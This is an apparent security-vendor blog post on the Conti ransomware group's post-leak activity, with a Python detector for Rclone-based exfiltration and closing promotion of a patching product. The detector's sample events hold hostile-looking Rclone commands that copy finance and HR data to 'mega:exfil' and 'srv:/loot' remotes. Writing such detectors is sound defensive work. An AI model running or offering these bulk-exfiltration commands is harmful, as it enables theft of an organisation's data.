The Conti Group Is Still in Business Despite the Data Leak It Faced
The gang continues to exfiltrate data from its victims.
The Conti ransomware group is apparently still operational and waging attacks against victims worldwide, even though its internal communications were leaked online in February.
Conti Still in the Cyber Game
To briefly recap Conti’s activities: the group is one of the most prolific ransomware operations of the past year, having encrypted the networks of hospitals, corporations, government agencies, and other organizations and demanded large ransom payments for the decryption keys.
According to ZDNet, many cybersecurity experts believe that Conti, like many other prominent ransomware operations, is based in Russia. In February, Conti members also publicly declared their support for Russia’s invasion of Ukraine.
Soon afterward, the Conti leaks surfaced, naming members of the gang and publishing daily chat logs, hiring processes, and other details of the group’s inner workings. Nevertheless, the public exposure of Conti’s behind-the-scenes operations appears to have had no effect on the gang.
Cybersecurity analysts at NCC Group, in a recent report, highlight that Conti’s attacks have continued after the leaks:
In February 2022, a Twitter account which uses the handle ‘ContiLeaks’ started to publicly release information about the operations of the cybercrime group behind the Conti ransomware. (…) Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware.
Methods Used by Conti Post Leak
The NCC Group analysts found that, in recent attacks, Conti has used a variety of initial access vectors to gain a foothold on networks: phishing emails carrying the Qakbot trojan, compromise of unpatched Microsoft Exchange servers, and exploitation of publicly known vulnerabilities in VPN appliances and the Log4j Java library. The attackers also send their phishing emails from legitimate accounts they have compromised.
Conti operations are known for encrypting networks and demanding payment for the decryption key, as well as for stealing sensitive data from victims and threatening to publish it if the ransom isn’t paid.
Conti hasn’t changed this approach despite having its own internal data leaked: it is still stealing large amounts of data from victims to use as leverage in double-extortion attacks.
Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ was configured to upload to either the Mega cloud storage provider or to a threat actor-controlled server. Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.
What Security Measures Should Be Implemented for Now?
Conti, together with other ransomware groups, continues to pose a threat to businesses and everyday services, but a severe attack can be prevented if the proper security measures are in place.
Many Conti intrusions, according to the researchers, rely on unpatched vulnerabilities for initial access, so businesses should apply security fixes for known vulnerabilities as soon as possible to keep attackers out.
Furthermore, strong password policies should be enforced, and multi-factor authentication should protect all user accounts.
Security staff should also monitor their networks so that suspicious activity is detected promptly: even when attackers are already inside, a ransomware deployment can still be averted if they are discovered before the encryption stage. The NCC Group finding that roughly five days pass between lateral movement and encryption, with bulk Rclone uploads in between, means the exfiltration itself is a realistic detection opportunity.
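As an added example of that kind of monitoring (not part of the original article or the NCC Group report), the script below scores process-creation events for the Rclone exfiltration pattern the report describes: bulk copy/sync commands to a Mega remote or to a remote server, including the case where the rclone binary has been renamed. The log format and field names (Image, CommandLine, User), the sample events, and the sanctioned-account allowlist are constructed assumptions for illustration.

```python
"""Flag Rclone-style bulk exfiltration in endpoint process-creation events.

Added example: the heuristics mirror the Rclone tradecraft the article quotes
(bulk copy/sync to a Mega remote or an attacker-controlled server). The event
schema, the sample events and the allowlist are assumptions, not real telemetry.
"""
import re
from typing import Optional

# rclone launched under its real name, from any path, with or without .exe
RCLONE_IMAGE = re.compile(r"(?:^|[\\/])rclone(?:\.exe)?$", re.IGNORECASE)
# sub-commands that move data; used to catch a renamed binary
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# flags that are rclone-specific enough to raise confidence on their own
RCLONE_FLAGS = {"--config", "--transfers", "--multi-thread-streams",
                "--ignore-existing", "--no-check-certificate", "-P", "--progress"}
# rclone addresses a configured remote as  name:path
REMOTE_RE = re.compile(r"^(?P<remote>[A-Za-z0-9_.-]+):(?P<path>.*)$")
DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:[\\/]")   # C:\... is a drive, not a remote
MEGA_RE = re.compile(r"mega", re.IGNORECASE)

# Hypothetical allowlist of accounts that run sanctioned rclone backups.
SANCTIONED_USERS = {r"CORP\svc-backup"}


def _remotes(tokens):
    """Return rclone remote names referenced on the command line."""
    found = []
    for tok in tokens:
        t = tok.strip('"')
        m = REMOTE_RE.match(t)
        # skip drive-letter paths and URLs (scheme://host), which also contain ':'
        if not m or DRIVE_PATH_RE.match(t) or m.group("path").startswith("//"):
            continue
        found.append(m.group("remote"))
    return found


def analyze_event(event: dict) -> Optional[dict]:
    """Score one process-creation event; None when nothing rclone-like is present."""
    image = event.get("Image", "")
    tokens = event.get("CommandLine", "").split()
    score, reasons = 0, []

    is_rclone_image = bool(RCLONE_IMAGE.search(image))
    if is_rclone_image:
        score += 3
        reasons.append("rclone binary executed")
    verb = next((t.lower() for t in tokens if t.lower() in RCLONE_VERBS), None)
    remotes = _remotes(tokens)
    if verb and remotes:
        score += 3
        reasons.append(f"'{verb}' to rclone remote(s) {remotes}")
        if not is_rclone_image:
            reasons.append("binary renamed: rclone syntax without rclone image name")
    if score == 0:
        return None                      # no rclone indicator at all

    flags = sorted({t.split("=", 1)[0] for t in tokens} & RCLONE_FLAGS)
    if flags:
        score += min(len(flags), 2)
        reasons.append(f"rclone-specific flags {flags}")
    if any(MEGA_RE.search(r) for r in remotes):
        score += 2
        reasons.append("Mega cloud storage remote referenced")
    if event.get("User") in SANCTIONED_USERS:
        score -= 6                       # expected backup job, keep as informational
        reasons.append("sanctioned backup account (downgraded)")
    else:
        score += 1
    severity = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"severity": severity, "score": score, "reasons": reasons, "event": event}


def scan(events):
    """Analyze a batch of events and return findings, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = [f for ev in events if (f := analyze_event(ev))]
    return sorted(findings, key=lambda f: order[f["severity"]])


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe", "User": r"CORP\jdoe",
     "CommandLine": r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe copy C:\Finance mega:exfil --transfers 20 -P"},
    {"Image": r"C:\Windows\Temp\svchost.exe", "User": r"CORP\admin",
     "CommandLine": r"C:\Windows\Temp\svchost.exe sync \\fs01\hr srv:/loot --config C:\Windows\Temp\r.conf --ignore-existing --transfers=30"},
    {"Image": r"C:\Windows\System32\robocopy.exe", "User": r"CORP\jdoe",
     "CommandLine": r"C:\Windows\System32\robocopy.exe C:\Data D:\Backup /E"},
    {"Image": r"C:\Program Files\rclone\rclone.exe", "User": r"CORP\svc-backup",
     "CommandLine": r'"C:\Program Files\rclone\rclone.exe" sync D:\Backups offsite-backup:nightly --config C:\ProgramData\rclone.conf'},
    {"Image": r"C:\Windows\System32\cmd.exe", "User": r"CORP\jdoe",
     "CommandLine": r"cmd.exe /c copy C:\quarterly.xlsx \\fs01\share\ "},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["event"]["User"], "|", "; ".join(f["reasons"]))
```

The second sample shows why matching on the image name alone is not enough: a renamed rclone still carries the `verb source remote:path` syntax and its own flags, which is what the command-line heuristics key on. In a real deployment the allowlist should be keyed on the full path, hash and parent process of the sanctioned backup job, not on the account name alone.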
How Can Heimdal™ Help?
Since keeping software up to date is one of the essential security measures, we recommend Heimdal Patch & Asset Management, a solution that keeps your systems patched automatically. Its distinctive advantage is the shortest vendor-to-end-user waiting time: the most recent patches are repackaged, tested, cleaned of adware and made available in your Heimdal cloud, ready to deploy, in less than 4 hours. Prevention is always the easiest path to fighting malware.